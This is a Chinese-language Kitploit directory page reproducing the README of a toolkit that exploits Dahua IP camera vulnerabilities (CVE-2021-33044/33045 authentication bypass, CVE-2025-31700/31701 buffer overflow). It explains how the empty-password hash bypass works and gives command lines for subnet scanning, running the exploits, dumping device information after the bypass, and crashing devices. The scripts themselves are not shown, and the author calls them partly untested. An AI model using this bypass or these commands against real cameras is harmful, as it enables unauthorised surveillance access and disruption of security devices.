Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
dahua-cve-research — 大华IP摄像头CVE研究工具包(CVE-2021-33044/33045、CVE-2025-31700/31701) | Kitploit
工具/GitHubGitHub/umair-aziz025/dahua-cve-research
物联网安全网络映射漏洞分析漏洞利用Web应用程序漏洞利用渗透测试身份验证学习与教育
GitHubumair-aziz025/dahua-cve-research

dahua-cve-research

大华IP摄像头CVE研究工具包(CVE-2021-33044/33045、CVE-2025-31700/31701)

查看仓库
2164个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

大华 IP 摄像头 CVE 漏洞利用工具

⚠️ 开发中 — 这些脚本基于已发布的 CVE 详情,需要针对易受攻击的设备进行进一步测试,以确认其完整功能。

针对大华 IP 摄像头四个严重漏洞的研究与概念验证(PoC)脚本。


⚠️ 法律免责声明

root@kitploit:~
本软件仅供教育和经授权的安全测试目的使用。

使用这些工具即表示您同意:
  1. 您已获得测试目标系统的明确书面授权
  2. 您不会将这些工具用于非法活动
  3. 您对自己的行为承担全部责任
  4. 作者不对任何滥用或损害承担责任

在大多数司法管辖区,未经授权访问计算机系统属于刑事犯罪。

涉及的 CVE

CVECVSS类型状态
CVE-2021-330449.8 严重认证绕过CISA KEV(已被积极利用)
CVE-2021-330459.8 严重认证绕过CISA KEV(已被积极利用)
CVE-2025-317008.1 高危缓冲区溢出 DoS近期(2025)
CVE-2025-317018.1 高危缓冲区溢出 DoS近期(2025)

CVE-2021-33044 与 CVE-2021-33045 — 认证绕过

  • CVSS: 9.8 严重
  • CWE: CWE-287(身份验证不当)
  • 机制: RPC2 登录接受空密码哈希,从而授予管理员访问权限
  • 影响范围: IPC-HUM7xxx、IPC-HX3xxx/HX5xxx、TPC-、VTO-、VTH-、NVR-、XVR-*
  • 修复版本: 固件 2.820.x+(IPC)/ 4.001.x+(NVR/XVR)
  • 参考资料:
    • NVD CVE-2021-33044
    • NVD CVE-2021-33045
    • CISA KEV 目录

CVE-2025-31700 与 CVE-2025-31701 — 缓冲区溢出(DoS/RCE)

  • CVSS: 8.1 高危
  • CWE: CWE-120(未检查输入大小的缓冲区复制)
  • 机制: 超大报文导致缓冲区溢出 → 崩溃或潜在 RCE
  • 参考资料:
    • NVD CVE-2025-31700
    • 大华安全公告

认证绕过的工作原理

大华摄像头通过 /RPC2_Login 使用挑战-响应认证:

root@kitploit:~
Normal Login:
  step1 = MD5("admin:realm:PASSWORD")
  step2 = MD5("step1:random:step1")

Bypass (CVE-2021-33044/45):
  step1 = MD5("admin:realm:")      ← EMPTY password
  step2 = MD5("step1:random:step1")

存在漏洞的固件会接受空密码哈希,并返回有效的会话令牌。


脚本


安装

root@kitploit:~
# Clone repository
git clone https://github.com/umair-aziz025/Dahua_IP_Camera_CVE_Exploit.git
cd Dahua_IP_Camera_CVE_Exploit

# Install dependencies
pip install requests

用法

网络扫描器

root@kitploit:~
# Scan subnet (ports required)
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 8081

# Single host with port
python dahua_scanner.py 192.168.1.100:8081

# Full options
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 -w 100 -t 10 -v -o results.json

# Show help
python dahua_scanner.py --help

大华常见端口:80, 8000, 8080, 8081, 8888, 9000, 443, 37777

多 CVE 漏洞利用(推荐)

root@kitploit:~
python dahua_exploit.py 192.168.1.100 -p 8081
python dahua_exploit.py 192.168.1.100 -c 2021-33044  # Single CVE
python dahua_exploit.py --help

认证绕过

root@kitploit:~
python dahua_auth_bypass.py 192.168.1.100 -p 8081
python dahua_auth_bypass.py 192.168.1.100 --dump  # Dump device info after bypass

缓冲区溢出 DoS

root@kitploit:~
python dahua_rce.py 192.168.1.100 -p 8081
python dahua_rce.py 192.168.1.100 --cve http  # HTTP only
python dahua_rce.py 192.168.1.100 --cve tcp   # TCP/37777 only

⚠️ 警告: DoS 脚本可能导致目标设备崩溃。


依赖

root@kitploit:~
requests

其余导入均来自 Python 标准库: socket、struct、hashlib、threading、ipaddress、argparse、json


开发状态

🚧 正在积极开发中

这些脚本基于以下内容开发:

  • NVD 已公布的 CVE 详情
  • 大华安全公告
  • 公开的 PoC 参考资料(seclists.org、packetstormsecurity)

测试状态:

  • ✅ 已按照 CVE 规范实现认证绕过逻辑
  • ✅ 已根据安全公告构造缓冲区溢出载荷
  • ⚠️ 针对在线易受攻击设备的测试有限
  • ⚠️ 需要针对不同固件版本进行额外验证

如果您可以访问易受攻击的设备进行测试,欢迎贡献代码和反馈。


贡献

  1. Fork 该仓库
  2. 创建功能分支
  3. 测试您的更改
  4. 提交 Pull Request

请报告任何问题或误报。


参考链接

  • NVD - CVE-2021-33044
  • NVD - CVE-2021-33045
  • NVD - CVE-2025-31700
  • NVD - CVE-2025-31701
  • CISA 已知被利用漏洞
  • 大华安全中心
  • Bashis PoC - Seclists

许可证

MIT 许可证 — 请参阅 LICENSE 文件。


作者

Umair Aziz
GitHub:@umair-aziz025


仅供教育与授权安全研究使用。

下载工具
文件用途CVE
dahua_scanner.py网络发现 — 在子网中查找大华摄像头检测
dahua_exploit.py多 CVE 扫描器 — 测试所有漏洞全部
dahua_auth_bypass.py专用认证绕过,带 --dump 选项CVE-2021-33044/45
dahua_rce.py缓冲区溢出 DoS 探测CVE-2025-31700/01